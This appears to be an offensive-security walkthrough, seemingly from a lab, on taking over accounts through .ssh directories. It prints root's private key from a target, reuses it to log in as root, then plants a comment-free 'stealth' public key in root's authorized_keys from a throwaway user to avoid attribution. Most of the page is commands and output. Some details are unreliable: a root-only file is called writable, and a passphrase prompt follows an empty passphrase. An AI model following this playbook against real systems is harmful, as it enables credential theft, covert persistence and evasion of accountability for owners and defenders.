SSH DIRECTORY
If read access is available to a user's .ssh directory (e.g., "/home/user/.ssh/" or "/root/.ssh/", it's possible to exfiltrate private SSH key "id_rsa". Once copied to the attacker's machine, this key can be used to authenticate as that user via SSH using the -i flag.
READ ACCESS
#enumerate
user@target:~$ ls -la ~/.ssh; ls -la /root/.ssh
ls: cannot access '/home/user2/.ssh': No such file or directory
total 20
drwxr-x--- 1 root user2 4096 Feb 12 2021 .
drwxr-x--- 1 root user2 4096 Feb 12 2021 ..
-rw------- 1 root root 571 Feb 12 2021 authorized_keys
-rw-r--r-- 1 root root 2602 Feb 12 2021 id_rsa
-rw-r--r-- 1 root root 571 Feb 12 2021 id_rsa.pub
#
user@target:~$ cat /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt3nX57B1Z2nSHY+aaj4lKt9lyeLVNiFh7X0vQisxoPv9BjNppQxV
PtQ8csvHq/GatgSo8oVyskZIRbWb7QvCQI7JsT+Pr4ieQayNIoDm6+i9F1hXyMc0VsAqMk
05z9YKStLma0iN6l81Mr0dAI63x0mtwRKeHvJR+EiMtUTlAX9++kQJmD9F3lDSnLF4/dEy
G4WQSAH7F8Jz3OrRKLprBiDf27LSPgOJ6j8OLn4bsiacaWFBl3+CqkXeGkecEHg5dIL4K+
aPDP2xzFB0d0c7kZ8AtogtD3UYdiVKuF5fzOPJxJO1Mko7UsrhAh0T6mIBJWRljjUtHwSs
ntrFfE5trYET5L+ov5WSi+tyBrAfCcg0vW1U78Ge/3h4zAG8KaGZProMUSlu3MbCfl1uK/
...==
-----END OPENSSH PRIVATE KEY-----
#
root@oco:~$ nano target-94.237.48.12-id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt3nX57B1Z2nSHY+aaj4lKt9lyeLVNiFh7X0vQisxoPv9BjNppQxV
PtQ8csvHq/GatgSo8oVyskZIRbWb7QvCQI7JsT+Pr4ieQayNIoDm6+i9F1hXyMc0VsAqMk
05z9YKStLma0iN6l81Mr0dAI63x0mtwRKeHvJR+EiMtUTlAX9++kQJmD9F3lDSnLF4/dEy
G4WQSAH7F8Jz3OrRKLprBiDf27LSPgOJ6j8OLn4bsiacaWFBl3+CqkXeGkecEHg5dIL4K+
aPDP2xzFB0d0c7kZ8AtogtD3UYdiVKuF5fzOPJxJO1Mko7UsrhAh0T6mIBJWRljjUtHwSs
ntrFfE5trYET5L+ov5WSi+tyBrAfCcg0vW1U78Ge/3h4zAG8KaGZProMUSlu3MbCfl1uK/
...==
-----END OPENSSH PRIVATE KEY-----
* paste copied key value
root@oco:~$ chmod 600 target-94.237.48.12-id_rsa
* changing the file permission to restrictive is required; else
the ssh server would prevent them from working
root@oco:~$ ssh -i target-94.237.48.12-id_rsa [email protected] -p 45074
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 6.1.0-10-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@target:~#WRITE ACCESS: NON-ATTRIBUTION METHOD
With write access to a target user's .ssh directory, an attacker can append their public key to the target's authorized_keys file, granting SSH access as that user. This technique only works if the attacker already has control over the target user, as most SSH configurations will reject keys added by unauthorized users.
#identify whether write access is allowed
user2@target:~$ ls -la /root/.ssh
total 24
drwxr-x--- 1 root user2 4096 Feb 12 2021 .
drwxr-x--- 1 root user2 4096 Jun 8 02:27 ..
-rw------- 1 root root 571 Feb 12 2021 authorized_keys
-rw-r--r-- 1 root root 2602 Feb 12 2021 id_rsa
-rw-r--r-- 1 root root 571 Feb 12 2021 id_rsa.pub
* write access identified in the authorized_keys file
#use for non-attribution
root@oco:~$ sudo adduser --disabled-password --gecos "" deploy
Adding user `deploy' ...
Adding new group `deploy' (1003) ...
Adding new user `deploy' (1003) with group `deploy (1003)' ...
Creating home directory `/home/deploy' ...
Copying files from `/etc/skel' ...
Adding new user `deploy' to supplemental / extra groups `users' ...
Adding user `deploy' to group `users' ...
* This creates a local user "deploy" without a password and isn't able to log in
without specifically being allowed
root@oco:~$ sudo -u deploy -i
* the -i fully simulates the specified user's login
root@oco:~$ ssh-keygen -t rsa -b 3072 -C "" -f ~/.ssh/target-94.237.48.12-stealth_key
Generating public/private rsa key pair.
Created directory '/home/deploy/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/deploy/.ssh/target-94.237.48.12-stealth_key
Your public key has been saved in /home/deploy/.ssh/target-94.237.48.12-stealth_key.pub
The key fingerprint is:
SHA256:NpCtK/Xs8H2ZmWfXufjMP5AhKIRYhJwxNYbnewyY13o
The key's randomart image is:
+---[RSA 3072]----+
| .oX*. |
| *oo.+ |
| = = . . |
| o + = . . . |
| . B S . o |
| + E . o |
| . = o =. o|
| . + . * *oo|
| o .. +.*=|
+----[SHA256]-----+
* the -C "" prevents adding real username@hostname as a comment
* the -f key saves private key as key and public key as key.pub
- key is the private key that is kept secret
- key.pub is the public key that is deployed on the target
#append append ...stealth_key.pu content to target authorized_keys files
root@oco:~$ cat /home/deploy/.ssh/target-94.237.48.12-stealth_key.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzg1T8hf18kqKqIDlt77RVn9e/E1/XxQlv9oc8g6Oi/4l/6exWxB65veTijVBjx2n7Or75a8K4X1eubO5mAXTlDFk5LT/sn2oX9hw79oE5a4B22zUsaXx7K9ojTnxGnWXdq2ej2njBgYxbZseupLi2h23Fby7y0RmnCWm71EH1WNJT7BHIRfh977KUNPs6i+WENW6n7zx45YezaT+HX44nJsIZn+s/Ggoch82mpFaIeR2LQOl+X/MUodi+G0qj2xBvi/dIMyTmG+7bMfdIW2NXeKvS/qMPJnWVV+L6CmMleViiTkzY1WH9RRiIhpMUmsfTlaCLevQ7aQDPL5AXI/IkFzew6Uzp/6mbxLlxkD4OVc2TLJNV24EoTidMdtkmBISEw1QxqNcYm6liwrvqFFhRpHn24pNI7evuGzYYOvC4gIaVeOgNn7t9e6Q8CAyP5XhMxCESEgOlcAEEZrBQASjT8O8ul7OhlymPBVpgVKCssh2xvcNLUWwdLhpXnKpzou0=
* copy this public key to the target's WRITABLE authorized_key file
- NO youruser@yourhost is required when injecting the public key in the authorized_keys file
- the youruser@yourhost is an optional comment portion and ignored by the SSH daemon for authentication
- it is merely for human readability only and has no impact on functionality.
- the comment part can be replaced by something innocuous such as key1
user2@target:~$ nano /root/.ssh/authorized_keys
ssh-rsa...
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzg1T8hf18kqKqIDlt77RVn9e/E1/XxQlv9oc8g6Oi/4l/6exWxB65veTijVBjx2n7Or75a8K4X1eubO5mAXTlDFk5LT/sn2oX9hw79oE5a4B22zUsaXx7K9ojTnxGnWXdq2ej2njBgYxbZseupLi2h23Fby7y0RmnCWm71EH1WNJT7BHIRfh977KUNPs6i+WENW6n7zx45YezaT+HX44nJsIZn+s/Ggoch82mpFaIeR2LQOl+X/MUodi+G0qj2xBvi/dIMyTmG+7bMfdIW2NXeKvS/qMPJnWVV+L6CmMleViiTkzY1WH9RRiIhpMUmsfTlaCLevQ7aQDPL5AXI/IkFzew6Uzp/6mbxLlxkD4OVc2TLJNV24EoTidMdtkmBISEw1QxqNcYm6liwrvqFFhRpHn24pNI7evuGzYYOvC4gIaVeOgNn7t9e6Q8CAyP5XhMxCESEgOlcAEEZrBQASjT8O8ul7OhlymPBVpgVKCssh2xvcNLUWwdLhpXnKpzou0=
* there can be multiple entries each separated by their own line
#access the target
root@oco:~$ ssh -i ~/.ssh/target-94.237.48.12-stealth_key [email protected] -p 45074
The authenticity of host '[94.237.48.12]:45074 ([94.237.48.12]:45074)' can't be established.
ED25519 key fingerprint is SHA256:KDcF5lg81jNEGgdr67bEo+Ui1pmsyHXKnw/ZHPLZCyY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[94.237.48.12]:45074' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/deploy/.ssh/target-94.237.48.12-stealth_key':
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 6.1.0-10-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Sun Jun 8 02:27:59 2025 from 10.30.18.213
root@target:~$Last updated